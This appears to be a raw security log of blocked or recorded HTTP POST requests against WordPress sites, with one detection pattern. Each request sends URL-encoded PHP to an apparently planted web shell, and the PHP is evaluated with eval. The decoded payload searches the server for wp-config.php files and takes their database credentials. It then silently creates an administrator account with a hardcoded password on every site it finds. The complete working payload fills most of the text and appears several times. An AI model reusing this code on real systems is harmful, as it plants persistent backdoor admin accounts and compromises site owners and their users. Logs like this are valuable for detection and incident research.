%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));","POST \/wp-includes\/Text\/vfgsbqo\/pkaegxl\/l1ghdav\/mcp.bak.php HTTP\/1.1\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\nsec-fetch-dest:document\naccept:*\/*\nsec-ch-ua:\"Chromium\";v=\"110\", \"Not A(Brand\";v=\"24\", \"Google Chrome\";v=\"110\"\nupgrade-insecure-requests:1\nsec-ch-ua-mobile:?0\ncontent-length:12663\nsec-ch-ua-platform:\"Windows\"\ncontent-type:application\/x-www-form-urlencoded\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\naccept-encoding:gzip,deflate\nsec-fetch-site:none\nsec-fetch-user:?1\nsec-fetch-mode:navigate\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/110.0.0.0 Safari\/537.36\n\nurOhQZ=eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));"]
["2026-05-16 12:14:27","213.209.159.254","POST","\/wp-includes\/pomo\/mo.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/120.0.0.0 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> HaFMzo:eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%